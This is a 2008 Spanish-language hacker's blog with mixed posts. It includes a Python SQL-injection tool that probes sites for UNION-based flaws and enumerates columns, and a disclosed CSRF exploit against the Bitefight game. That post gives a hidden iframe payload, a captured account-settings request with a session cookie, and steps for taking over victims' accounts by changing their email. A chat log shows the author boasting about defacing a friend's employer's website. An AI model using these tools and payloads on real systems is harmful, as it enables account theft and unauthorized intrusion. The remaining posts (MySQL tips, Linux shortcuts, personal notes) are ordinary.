domingo, 9 de noviembre de 2008

chekp0rt

Bueno siguiendo con las clases de python xDD jeej hice un simple scanner de puertos, si se les ocurre algo que ponerle diganme y trataremos de ponerlo para las futuras versiones :-D

import socket

print "Simple Port Scanner - chekp0rt"
print "Komtec1 komtec1[at]gmail[dot]com"
print "www.hslteam.org"

def chekandopuertos():
 
probandoconexion = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 

 
try:
 
 
probandoconexion.connect((ip,x))
 
 
print
"Puerto", x, "abierto en ", ip
 

 
 
print
probandoconexion.connect((ip,x))
 
 
probandoconexion.close()
 
except:
 
 
pass
 
probandoconexion.close()

ip = raw_input("Ingresa la IP: ")
pinicial = int(raw_input("Ingresa el puerto Inicial: "))
pfinal = int(raw_input("Ingresa el puerto final: "))
for
x in range(pinicial,pfinal):
 
try:
 
 
chekandopuertos()
 
except:
 
 
pass

y les adjunto el archivo y un screen de como funciona Lengua :

http://hslteam.org/chekp0rts.rar



PD. Ya hay ideas para la version 0.2 :-D

Saludos!!!!

Komtec1

jueves, 30 de octubre de 2008

Esekuele v 0.1

Bueno esta es la primera version de esekuele conforme vaya teniendo mas tiempo y mas ideas la tratare de ir mejorando

hasta ahorita esta muuuuucho muy basica, lo unico que hace es verificar si la pagina es vulnerable si devuelve la cadena:

The used SELECT statements have a different number of columns

y de ahi sacar el numero de columnas.

ver si despues meterle un ataque de columnas mediante diccionario, conforme vaya teniendo mas tiempo Lengua y tambien si tienen ideas son
aceptadas para ver que mas le podemos poner :-D

aqui les dejo el code:

import urllib2
import string
uno
= "-1/**/union/**/select/**/"
dos = "-1+union+select+/"
print '\n |-----------------------------------------------------------|'
print '\n |----| Komtec1 www.hslteam.org komtec1[at]gmail[dot]com |---|'
print '\n |-------------------| esekuele.py |-------------------------|'
print '\n |-----------------------------------------------------------|'
print '\n |Uso: \n Ingresa Url: '
 

print
'\n |http://www.pagina.com.mx/index.php?id='

print '\n |Donde: id es la variable vulnerable'
print '\n |-----------------------------------------------------------\n\n'
print '\nIngresa la Url'
url2 = raw_input("")
print
'\nEscoje la Inyexion:'
print '\n1: -1/**/union/**/select/**/'
print '\npronto mas xD'
iny = raw_input("")
if
iny == '1':

 
url = url2 + uno
#elif iny == '2':
#
 
url = url2 + dos
else:
 
print
'\nYou think you could fool me -.-'
 
exit()
a = "1"
sql = url + a + "/*"

vulnerable = urllib2.urlopen(sql)
vulnerable2 = vulnerable.read()
if
vulnerable2.find("The used SELECT statements have a different number of columns") >= 0:
 
print
"Es vulnerable, continua el proceso...."
else:
 
print
"No es vulnerable o al menos el inyector no lo detecta xD"

 
exit()
b = 2
for x in range(1, 2000):
 
print
url + a + "/*"
 
sql = url + a + "/*"
 
iny = urllib2.urlopen(sql)
 
chekar = iny.read()
 
if
chekar.find("The used SELECT statements have a different number of columns") >= 0:
 
 
print
"aumentanto columna"

 
else:
 
 
print
"Columnas encontradas... lucky strike!!!"
 
 
print
url + a + "/*"
 
 
print
"Have fun!! :-D"
 
 
exit()
 

 
print
iny.read()
 
iny.close()
 
str(a)

 
a = a + "," + str(b)
 
b = b + 1

y les adjunto el archivo y un screen de como funciona Lengua :

http://hslteam.org/esekuele.rar

domingo, 19 de octubre de 2008

Bitefight Vulnerabilidad XSRF Bitefight Vulnerabilidad XSRF

Bueno hace algun tiempo (poco en realidad xD ) jugaba bitefight jejejej y por cuestiones ajenas a mi xD me bannearon la cuenta, estuve viendo y bitefight es vulnerable a XSRF lo investigue con algo sencillo, al ver que no pedia confirmacion alguna al momento de hacer un cambio en la cuenta trate con comprar fuerza registrandome con otra cuenta, algo asi:

al poner "codigo malicioso" en alguna web es posible realizar acciones sin consentimiento del usuario, por ejemplo si queremos comprar alguna habilidad o que el usuario gaste dinero en una sola cosa e pondria algo como esto:

< width="0px" src="http://s7.bitefight.com.mx/bite/training.php?b=1" height="0px" align="center">< /iframe >

esa parte es para comprar fuerza, se agrega en una pagina y al momento que el usuario entra a la web maliciosa, automaticamente (si esta logueado en bitefight claro

defensa: http://s7.bitefight.com.mx/bite/training.php?b=2
destreza: http://s7.bitefight.com.mx/bite/training.php?b=3
resistencia: http://s7.bitefight.com.mx/bite/training.php?b=4
carisma: http://s7.bitefight.com.mx/bite/training.php?b=5

y asi hay varias acciones para hacer dentro del bf, tal vez diran que no es muy relevante, pero veamos y adentremos un poco mas en el tema, que tal si hacemos que el codigo malicioso sea un archivo php en el cual mande los headers correctos, podriamos incluso robar cuentas, borrarlas y todo lo que pueda hacer un usuario normal, este es el metodo post que se hace al cambiar un mail:

------------------

http://s7.bitefight.com.mx/bite/einstellungen.php




POST /bite/einstellungen.php HTTP/1.1

Host: s7.bitefight.com.mx

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://s7.bitefight.com.mx/bite/einstellungen.php

Cookie: BiteFight=59116%3B018580472e62cff0a377c14592cc2534

Content-Type: application/x-www-form-urlencoded

Content-Length: 139

w=y&vkey=f9e95b7f78e1c31713bb9d849b0b5f5b&email=komtec1%40gmail.com&rpg=&catch=&1=1&2=1&3=1&4=&5=&6=&7=&8=&passo=&passn1=&passn2=&delete0=0

HTTP/1.x 200 OK

Date: Sun, 19 Oct 2008 08:51:26 GMT

Server: Apache

Connection: close

Cache-Control: no-cache

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 3315

Content-Type: text/html; charset=utf-8

---------------------

si en esa parte cambiamos Cookie por un getcookie() en el servidor de bitefight y en la variable vkey validandola con la sesion, asi como email por el nuestro o el deseado a cambiar en la cuenta, se cambiara el correo, despues de que cargue toda esa parte del code se necesita agregar otro iframe con la direccion:

http://s7.bitefight.com.mx/bite/einstellungen.php?validate=1

para que mande el correo de validacion al mail puesto antes...

asi cualqueir accion que quieran realizar pueden programar el codigo y hacer que la victima entre a la apgina maliciosa :-D

siguiendo estos pasos se puede juankear bitefight jejeje lo unico que tienes que tener en cuenta es poner el servidor adecuado (s1,s2,s3,s4, etc etc) y si es .com.mx o .es o .com.pe etc :-D

PD. les avise y pensaron que no era relevante por lo tanto me tiraron de a loco Lengua por eso libero esto :-D

si quieren ver un video de demostracion de este "bug" aqui tienen la direccion:

http://elbebedero.net/sipsicambia.rar

es el que les enseñe para que vieran que si era vulnerable Lengua

Saludos y espero le sepan sacar provecho :-D

Komtec1

viernes, 26 de septiembre de 2008

Trabajando con MySQL desde consola

Un poco de consultas sql con mysql :P

Bueno pongamos un tema acerca de consultas sql :P ahorita que las he estado practicando mas, algo basico pero psss weno para los que no sepan mucho aqui se pueden orientar un poco :P

los primeros pasos que sabemos (o al menos creo deberian saber :P) es conectarse a mysql de esta forma:

mysql -u suusuario -p

les pedira su pass y de ahi lo ingresan

despues si quieren que muestre las bases que tengan hacen esto:

show databases;

les mostrara las bases de datos que tengan ahi seleccionen con la que quieren trabajar:

use nombredesubasededatos

si quieren ver las tablas hacen esto:

show tables;

de ahi comenzamos la explicacion:


supongamos que tengo una base de datos llamada equis
primero nos situamos en la base de datos:

use equis

y en ella hay varias tablas pongamos que llamdas a,be,ce,de,e,efe y ge, dentro de ellas hay varios campos, supongamos que son por cada una respectivamente:


a1,a2,a3,a4,a5link,a6region

be1,be2,be3link,be4,be5,be6

ce1,ce2,ce3,ce4map,ce5,ce6

de1,de2,de3,de4,de5uno,de6,

e1,e2,e3,e4region,e5,e6

efe1,efe2,efe3,efe4uno,efe5,efe6

ge1,ge2,ge3map,ge4,ge5,ge6

cada campo se nota a que tabla va ligada asi no tengo que explicar eso :P

dentro de ellas queremos linkear varios campos y seleccionarlos para que se guarden en un archivo, pongamos un archivo de texto para que lo exporte en formato plano, en esta parte me refiero a una salida de este tipo:

mysql> select * from categories;
+-------+--------+-------------+----------+----------+-------------+----------------+--------+
| catid | name | description | keywords | catorder | permissions | parentcategory | status |
+-------+--------+-------------+----------+----------+-------------+----------------+--------+
| 1 | Arcade | Arcade | Arcade | 0 | 1 | 0 | 1 |
+-------+--------+-------------+----------+----------+-------------+----------------+--------+

creamos nuestro archivo de texto donde se guardaran todas las consltas ejecutadas:

tee nombrearchivo.txt

ok ahora vamos a la parte interesante, nuestra consulta :P

Supongamos que queremos tomar el campo a1,a2,a3,be1,be4,be6,ce1,ce3 y ce5 y los cuales los tenemos que comprobar, cuando se cumpla una condicion lo tome si no no, esto es decir, usemos estas comprobaciones:

donde a5link sea igual a b3link
a6region sea igual a e4region
ce4map sea igual a ge3map
de5uno sea igual a efe4uno

hagamos la consulta:

select a.a1,a.a2,a.a3,b.be1,b.be4,b.b6,c.ce1,c.ce3,c.ce5
from a a,be b,ce c,de d,e e,efe f,ge g
where
a.a5link = b.b33link and
a.a6region = e.e4region and
c.ce4map = g.ge3map and
d.de5uno = f.efe4uno;

ahora expliquemos la consulta :P

en el SELECT tomamos los campos que requerimos, ponemos tabla.campo
en el FROM definimos las tablas, las definimos de esta manera:

tabla nombrecorto

en estos casos:

a es a, be es b, etc....

al ultimo hacemos las comprobaciones necesarias para los campos en donde decimos que si se cumple una condicion entonces tomara los valores y mostrara los campos

el final nuestro archivo estara en c:\nombredearchivo.txt // (en lindows)

y todas las consultas que hayamos puesto estaran dentro, junto con su resultado :P

weno esto es todo el tuto, es corto y las comprobaciones puede que no "cuadren" en este ejemplo ya que solo fueron inventadas, pero si uds tienen una tabla con id's entonces esta seria la forma de que lo pueden manejar y concatenar (no se si este bine dicho concatenar :P ) pero en si est es el funcionamiento y como pueden tomar y acomodar las tablas ^^

espero este entendido y si no pues pongan sus comentarios en lo que tengan dudas o para mejorarlo :P

PD recuerden que con tablas pequeñas las consultas tardaran muy poco, y con tablas grandes, pues obvio el tiempo aumenta, pero no desesperen su mysql esta trabajando :P

Saludos!

Komtec1

domingo, 21 de septiembre de 2008

Skydrive de Microsoft Live

Weno hace tiempo que tengo el blog de http://musicindexof.com y psss ahi como saben (si es que han entrado alguna vez) se suben discos completos en descarga directa, encontrados por google claro :P pero habia un disco que me gusto mucho jejej y este es el de tenacious d the pick of destiny entonces un dia en el servidor que estaba lo pusieron off o quitaron las carpetas, no se cual de las dos :P y queria volver a ponerlo, busque algunas formas pero la mayoria no te daban descarga directa y/o escucharlo online, entonces un dia de esos que entro a mi gmail :P veo una publicidad de skydrive jejejej y me dio curiosidad por que decia almacenamiento gratis, psss entonces con la cuenta de mary (coolaboradora de http://musicindexof.com) me registre ahi mismo, usando la misma cuenta de hotmail de ella, primero subi una cancion y uando vi que me daba descarga directa psss dije: genial!!!!!!!!!!

http://1envhg.bay.livefilestore.com/y1pU2AV5rhlJsOlembYJ2LzDzvEclrcRS6ZsPmrzp56bQT9gDAo5cA97EwyTGrQrPZu_26MsPLrN-U/13%20Beelzeboss%20(The%20Final%20Showdown).mp3?download

para lo que dije psss weno yo quiero que se escuche ahi mismo en la pagina, para no perder el concepto, lo unico que hice es quitar la ultima parte y listo! tenemos archivos sin limite de tamaño (weno dan 5 gigas por cuenta de usuario :P )en descarga directa y a una velocidad super rapida!!!! quedaria la direccion asi:

http://1envhg.bay.livefilestore.com/y1pU2AV5rhlJsOlembYJ2LzDzvEclrcRS6ZsPmrzp56bQT9gDAo5cA97EwyTGrQrPZu_26MsPLrN-U/13%20Beelzeboss%20(The%20Final%20Showdown).mp3

y ahi pueden escuchar online o descargar el archivo! :-D

la direccion es esta:
http://skydrive.live.com

ahi si tienen cuenta hotmail pueden entrar con esa misma o registrarse :-D

Saludos

Komtec1

lunes, 25 de agosto de 2008

You think you could fool smf?? :P

El mismo dia que vi lo del libro de lo desconocido en smf, tambien encontre unos comentarios algo graciosos xD y estan "referenciados" hacia los usuarios jejeje, los que vi estan en el archivo Loginout.php y algunos de ellos son estos:

En la linea 178:
// You forgot to type your username, dummy! Este es claro cuando no pones ningun usuario en el logueo xD

En la linea 192:
// No funky symbols either. Este es por si quieres poner algun simbolo "funky" xDDDDDDDDDD a esto se refieren en "/&%=)($?=)?# etc etc :P

y en la lnea 305:
// Bad password! Thought you could fool the database?! jajajaj xD aqui en una parte que regresa el error si la contraseña de usuario es incorrecta xD :P

jejejje esos de smf que curas xD

miércoles, 20 de agosto de 2008

The Book of Unknown 4:16 Tambien en smf! muahahaha :P

Weno hace rato estaba leyendo el code de smf para entender unas cosillas de php y demas y en eso me tope con una parte chistosa jeje, asi como el Firefox tiene su libro de lo desconocido donde citan algunas frases medio raras, mafufas y tenebrosas, pssss nuestros amigos de simple machines forums o mas conocidos como smf tambien coolaboran con esta parte :P les dejo una direccion para que vean por uds mismos :P

http://www.google.com.mx/search?q=allinurl%3Aindex.php%3Faction%3Dabout%3Aunknown&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:es-ES:official&client=firefox-a

como ven ahi nos salen algunas paginas solamente, pero si quieres ver que esta en todos los smf, solo tienen que hacer esto:

http://url.com/path/index.php?action=about:unknown&verse=4:16
http://url.com/path/index.php?action=about:unknown&verse=2:18

y que a su vez nos redirige aqui:

http://www.unknownbrackets.com/about:unknown

:O :P

jejejej que cosas se ven en la pc T_T :P

pronto mas acerca de lo desconocido muahahah xD :P

martes, 19 de agosto de 2008

juajuajua soy un delincuente xD

[citar]
12.- Envía: Juan José Martínez
Pongan los nombres o firmas de esos hackers en el motor de busqueda de Google y verán que los tipos son profesionales, han hackeado infinidad de páginas y programas en México. Yo busqué el de Blesslost y el de Komtec1. Hagan la prueba y verás, los tipos de verdad que son unos delincuentes, se ufanan de haber hecho cantidad de barbaridades en la internet.
[/citar]

por culpa de zer0-z00rg soy un delincuente profesional! xD ajajaja :P :P :P :P felicidades por tus defaces bro ^^

domingo, 10 de agosto de 2008

Los dedos mas rapidos del oeste :P

jejejejej mi amigo Berumen me paso una pagina muy buena, es para ver cuantas palabras escribes por minuto, en mi 3er intento llegue aqui:

46 words

Speed test



You reached 282 points, so you achieved position 9408 of 50555 on the ranking list


You type 343 characters per minute
You have 46 correct words and
you have 0 wrong words

http://spanish-speedtest.10-fast-fingers.com/

veremos si sigo intentando despues y que lugar alcanzo jejej ^^

Saludos :-D :P

domingo, 27 de julio de 2008

Estudio grafológico de mi firma :P


Aqui les dejo un estudio que le hice a mi firma y segun eso mi personalidad :P

Grafológicamente, la firma es una biografía abreviada de su autor.
Debe observarse conjuntamente con un texto que la acompañe, pero de cualquier forma, de acuerdo a ciertas características específicas de su signatura, se puede distinguir lo siguiente:

La ubicación en el papel indica que se manifiesta como una persona centrada y cautelosa.
Según el tamaño de la firma, mediano, tiende a una extraversión moderada.
El predominio de formas rectas, revela disciplina, orden y cierto pragmatismo.
La horizontalidad indica una personalidad equilibrada, que acepta sus aciertos y errores.
La velocidad media señala una persona medida y justa en su accionar.
Según la presión de la escritura, posee un temperamento práctico y activo.
Al no poseer rúbrica, revela autenticidad y claridad; una persona que se acepta y se muestra tal cual es.
Al tener solo algunas letras legibles, indica que toma ciertas reservas antes de conceder su confianza a los demás.
La utilización de las mayúsculas en la firma permite deducir que tiene una buena autovaloración y autoimagen.
Al utilizar el nombre y apellido, demuestra un equilibrio entre el rol familiar y social. El 'Yo' íntimo y la tradición.

Las características precedentes de este informe son generales, y están enteramente basadas en lo que representa su estampa personal en el momento instantáneo en que la escribió, y muchos factores están sujetos al cambio permanente según el devenir de la vida.

Estudio grafológico gratuito de la firma
www.grafologico.com


long long time ago... xD

jejejjeej revisando y depurando la pc me encontre con este archivo de texto que tenia guardado, una conversacion que tuve con mi amigo Eduardo jejeje (o droopy si alguien lo conoce xD) :P

(12:39 p.m.) •°o.O ·÷±‡± (•?: PUEDES CAMBIAR EL INDEX DE LA PAGINA
(12:39 p.m.) •°o.O ·÷±‡± (•?: XDDD
(12:39 p.m.) •°o.O ·÷±‡± (•?: DE MI CHAMBA
(12:40 p.m.) http://komtec1.b: psss si lo mas seguro que is
(12:40 p.m.) http://komtec1.b: por?
(12:40 p.m.) •°o.O ·÷±‡± (•?: ESQUE ESTA AQUI UN CUATE DE LA TARDE
(12:40 p.m.) •°o.O ·÷±‡± (•?: Y PARA QUE VEA TU GRANDEZA
(12:44 p.m.) http://komtec1.b: cuenta hasta 30 :P
(12:44 p.m.) http://komtec1.b: pero cuenta
(12:44 p.m.) http://komtec1.b: quiero ver que cuentes
(12:44 p.m.) http://komtec1.b: y te llevas un regalo :P
(12:44 p.m.) Has enviado un zumbido.
(12:44 p.m.) •°o.O ·÷±‡± (•?: JAJAJAJAJJAJA
(12:44 p.m.) •°o.O ·÷±‡± (•?: WEY YA NO MAMES
(12:44 p.m.) •°o.O ·÷±‡± (•?: DEJA = EL INDEX
(12:44 p.m.) http://komtec1.b: cuenta PAM
(12:44 p.m.) •°o.O ·÷±‡± (•?: 1
(12:44 p.m.) •°o.O ·÷±‡± (•?: 2
(12:44 p.m.) •°o.O ·÷±‡± (•?: 3
(12:44 p.m.) •°o.O ·÷±‡± (•?: 4
(12:44 p.m.) •°o.O ·÷±‡± (•?: 5
(12:44 p.m.) •°o.O ·÷±‡± (•?: 6
(12:44 p.m.) •°o.O ·÷±‡± (•?: 7
(12:44 p.m.) •°o.O ·÷±‡± (•?: 8
(12:44 p.m.) •°o.O ·÷±‡± (•?: 9
(12:44 p.m.) •°o.O ·÷±‡± (•?: 10
(12:44 p.m.) •°o.O ·÷±‡± (•?: 11
(12:45 p.m.) •°o.O ·÷±‡± (•?: 12
(12:45 p.m.) •°o.O ·÷±‡± (•?: 13
(12:45 p.m.) http://komtec1.b: no leo que cuentes
(12:45 p.m.) http://komtec1.b: PAM
(12:45 p.m.) •°o.O ·÷±‡± (•?: 14
(12:45 p.m.) •°o.O ·÷±‡± (•?: 15
(12:45 p.m.) •°o.O ·÷±‡± (•?: 16
(12:45 p.m.) •°o.O ·÷±‡± (•?: 17
(12:45 p.m.) •°o.O ·÷±‡± (•?: 18
(12:45 p.m.) •°o.O ·÷±‡± (•?: 19
(12:45 p.m.) •°o.O ·÷±‡± (•?: 20
(12:45 p.m.) http://komtec1.b: JJ
(12:45 p.m.) •°o.O ·÷±‡± (•?: 21
(12:45 p.m.) •°o.O ·÷±‡± (•?: 22
(12:45 p.m.) •°o.O ·÷±‡± (•?: 23
(12:45 p.m.) •°o.O ·÷±‡± (•?: 24
(12:45 p.m.) •°o.O ·÷±‡± (•?: 25
(12:45 p.m.) •°o.O ·÷±‡± (•?: 26
(12:45 p.m.) •°o.O ·÷±‡± (•?: 27
(12:45 p.m.) •°o.O ·÷±‡± (•?: 28
(12:45 p.m.) •°o.O ·÷±‡± (•?: 29
(12:45 p.m.) •°o.O ·÷±‡± (•?: 30
(12:46 p.m.) •°o.O ·÷±‡± (•?: WEY NO MAMES
(12:46 p.m.) http://komtec1.b: q q q
(12:46 p.m.) •°o.O ·÷±‡± (•?: YA CAMBIA EL INDEX WE
(12:46 p.m.) •°o.O ·÷±‡± (•?: POR LA INTRO FLASH XDDD
(12:46 p.m.) •°o.O ·÷±‡± (•?: NOS EAS CULERO
(12:46 p.m.) http://komtec1.b: cual???
(12:46 p.m.) http://komtec1.b: por que??
(12:46 p.m.) http://komtec1.b: no cambie nada
(12:46 p.m.) •°o.O ·÷±‡± (•?: CON LÑA PAGINA PONCHO
(12:46 p.m.) •°o.O ·÷±‡± (•?: WEY ENTRA
(12:46 p.m.) •°o.O ·÷±‡± (•?: WWW.CDCAC.COM
(12:46 p.m.) http://komtec1.b: jajajaja
(12:46 p.m.) http://komtec1.b: xD
(12:48 p.m.) •°o.O ·÷±‡± (•?: QUE PEDO WEY YA
(12:49 p.m.) •°o.O ·÷±‡± (•?: VEZ QUE NO TENGO PERMISO DE ADMIN
(12:49 p.m.) http://komtec1.b: quieres que lo deje como estaba??? xD
(12:49 p.m.) •°o.O ·÷±‡± (•?: EN LA PAGINA XD
(12:49 p.m.) •°o.O ·÷±‡± (•?: SI WEY
(12:49 p.m.) http://komtec1.b: jejejjjjejeje xxDD
(12:49 p.m.) •°o.O ·÷±‡± (•?: NO SEAS CULERO PONCHO
(12:49 p.m.) http://komtec1.b: ya vio tu amigo???
(12:49 p.m.) •°o.O ·÷±‡± (•?: SI WEY
(12:49 p.m.) •°o.O ·÷±‡± (•?: SE CAGO
(12:49 p.m.) http://komtec1.b: ahi??? que cochino :-O
(12:49 p.m.) http://komtec1.b: xD
(12:49 p.m.) •°o.O ·÷±‡± (•?: DICE QUE PONIEDO UN FIREWALL MAS POTENTE
(12:49 p.m.) •°o.O ·÷±‡± (•?: JAJAJAJA
(12:49 p.m.) •°o.O ·÷±‡± (•?: WEY YA CAMBIALA
(12:49 p.m.) •°o.O ·÷±‡± (•?: NOS EAS CULERO
(12:50 p.m.) http://komtec1.b: un firewall mas potente
(12:50 p.m.) http://komtec1.b: ajajajajaj
(12:50 p.m.) http://komtec1.b: xD
(12:50 p.m.) •°o.O ·÷±‡± (•?: OKAS PONCHO

martes, 17 de junio de 2008

Google it's Watching you and the whole network too...



Bueno el post nada de otro mundo, solo mostrare un error que a mi parecer tiene google en bugsense adsense.

Bugsense Adsense como saben es una forma de vender con un sitio web que pone anuncios relevantes dependiendo el contenido del sitio, en una parte de la configuración adsense dice que si tienes algun contenido protegido le asignes un usuario y una contraseña, asi adsense podra ingresar al sitio, ver el contenido relevante del sitio y poner los ads de acuerdo al contenido e interes de los visitantes.

En esta parte es donde adsense tiene el problema ya que como todos saben google guarda un cache de todas las paginas inclusive de paginas protegidas por contenido, por ejemplo si queremos entrar a un sitio protegido mediante htaccess y no tenemos el usuario y password adecuados no nos dejara entrar por obvias razones :P

Pongamos un ejemplo:

www.joomlaspanish.com/foros/showthread.php?p=73719

presionamos esc y nos dice algo como esto:

Authorization Required
This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
________________________________________
Apache/1.3.39 Server at www.joomlaspanish.org Port 80

Ok hasta esa parte vamos bien, busquemos el foro de joomlaspanish en google:

http://www.google.com/search?num=100&hl=en&client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hs=Do7&q=joomlaspanish+foro&btnG=Search



Specifications: SSL - Foros Joomla! Spanish - Tu comunidad Joomla ...
Specifications: SSL Traducción de documentación para desarrolladores.
www.joomlaspanish.org/foros/showthread.php?t=11631 - 47k - Cached - Similar pages - Note this



el segundo link nos dirige al sitio, pero de igual manera si queremos entrar al sitio nos pide la autorización y nos devuelve el mismo error arriba mencionado.

Si presionamos en Cached nos dirige al sitio y aun asi nos pide la autorización, si presionamos esc nos seguira pidiendo la autorización pero en esta vez cargara el contenido de la pagina que tiene en cache de google.

¿El por que?

Como mencione arriba google nos da la opcion de agregar un usuario para mostrar ads relevantes en nuestro sitio, por lo tanto el contenido esta rastreado por adsense, por lo tanto por google, y almacenado en su cache por eso es posible que nos muestra el contenido de la pagina.

En este caso es una pagina en la cual pueden registrarse de manera gratuita, pero pensemos en la forma de que no lo sea, seria una perdida de $$$ para las paginas de contenido protegido que manejen adsense y que se pague algo para registrarse.

Bueno espero no les haya aburrido el post y cualquier critica sea buena o mala la acepto

Saludos :-D

viernes, 13 de junio de 2008

Que put@ excelente noche!

jjajajajaja mas mamon no se podia ver xD

*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
tengo como 0 MB de fotos de ---- ::X::X
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
10*
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
diez
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
te dire algo mira: select 10 MB ------' photos then do Add in -------.rar and send it to banivy@hslteam.org :D
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
jajajajajaaajajjaajjjajajjajaja
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
xD
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
Error 403
response denied
You dont have access to this zone
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
achilles >
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
http OK!
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
tengo acceso y permitido el create,delete
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
etc...
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
jajajjajaajajajja
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
y Usare mi Usuario Secreto
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
xDDDDDDDDDDDDDDDDDD
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
jijujijujiju
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
User: K1 Son
pass: Tumae!
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
jajajajjajajajaajajajja
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
xD
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
Acces Granted!
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
YEA!!!!!!!!!!!!
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
jajaajjajaajajaja xD
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
jajajajaja
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
jijujijujiju

foco geek xD

digo poco xD :P

miércoles, 11 de junio de 2008

Mi Pin de google

Weno el 28 de mayo recibi este mail de google:

Recientemente le hemos enviado su número de identificación personal (PIN) por correo postal ordinario. Debería recibirlo en el transcurso de las próximas 4 semanas. Una vez recibido el PIN, deberá introducirlo en su cuenta a fin de poder recibir pagos de AdSense. Para ello, siga las instrucciones que se incluyen en el mensaje que acompaña el PIN.

Hoy 10 de Junio llego mi PIN es genial ver como una carta llega a tu nombre y mas cuando tiene el logotipo de google impreso!! creo que es la primera carta a mi nombre, fuera de las obscuro y feo pasado xD :P (una historia anexa a mi vida xD ) se siente genial, creo que guardare este sobre siempre ejejej xD aparte de que se me hace raro recibir correo a la "antigüita" xD actualmente solo trabajo sobre e-mail xD :P

Saludos!

domingo, 1 de junio de 2008

2 Años

Weno pss hoy 1o de junio del 2008 cumplo dos años en el under, hack, juack, seguridad informatica o como le llamen uds, ahi vamos poco a poco aprendiendo aun mas, con menos tiempo ahora pero psss se hace lo que se puede, he conocido a mucha mucha gente en esto, no menciono ni uno por que si no tendria que mencionar a todos, pero pss weno hslteam ya murio, el otro proyecto psss nadie acordo nada y demas, pero weno aqui en el blog vamos poniendo poco a poco lo que se pueda, espero estar aqui mucho mas tiempo y pss gracias a todos ^^ no se que mas poner :P solo queria decir esto jeejjej :P

Regalenme unos asi no?????

lunes, 26 de mayo de 2008

Stickies 6.5a

Este es un buen programa para personas olvidadizas como yo xD, siempre se me olvida todo y si pego una notita no la cheko por que se me olvida leerla xD jejejejej pero weno aqui ya es diferente, por que si me acuerdo de presionar shift+teclalindows+s para que pueda ver las notas que tengo en la maquina :-P esta genial el programa, les dejo el link, y tiene idioma en español:

http://www.zhornsoftware.co.uk/stickies/download.html

puedes configurar los stickies como quieras, aqui para que cheken como se ve en mi escritorio:



Saludos!

jueves, 22 de mayo de 2008

Personalizando nuestra consola y programas en Linux

Bueno tal vez en algunos videos han visto que por arte de magia se abre una consola, o la fuente se reduce y demas, algunos me han preguntado que como se hace, es muy sencillo lo unico que se tiene que hacer es accesar a la consola y de ahi en settings, veamos :-)



entrando ahi vemos muchas cosas como esto:



como ven ahi ya tengo predefinido el comando copiar con la combinacion de teclas alt+c :-D

selecciono enlarge font (hacer letra mas grande) y le doy esta combinacion de teclas:



damos aceptar, entramos a la consola y veran que al presionar ctrl+shift+up la letra se hara mas grande, hay varios tipos de comandos (shrink font o algo asi es para hacer la letra mas peque?a) prueben ahi y vean, claro que si quieren poner una combinacion como:

ctrl+c para copiar nunca podran hacerlo ya que hay algunos parametros predefinidos para la consola de linux, en este caso seria un break o abort por lo tanto no lo podrian pocupar tambien para la sentencia copiar, ahora bien veamos como ejecutar programas de manera mas rapida :-P que de la misma forma es como ejecuto jedit, gimp, konsole :-P y varias cosillas, en mi caso se me hace mas practico trabajar cosas asi con teclado que andar buscando uno a uno :-P

vamos a una ruta de un programa en este caso seleccionare xmms



y nos abrira una pantalla como esta:



en current shotcut key haremos lo mismo que hace rato predefinimos las teclas de acceso directo:



por ultimo en la esquina superior izquierda damos click en el boton guardar:



cerramos y presionamos el keyshotcut que hayamos predefinido y se abrira el programa que hayamos escogido :-D

espero les guste y les sea util :-D

Saludos

miércoles, 21 de mayo de 2008

Configuración del modem e220 vodafone en slackware.

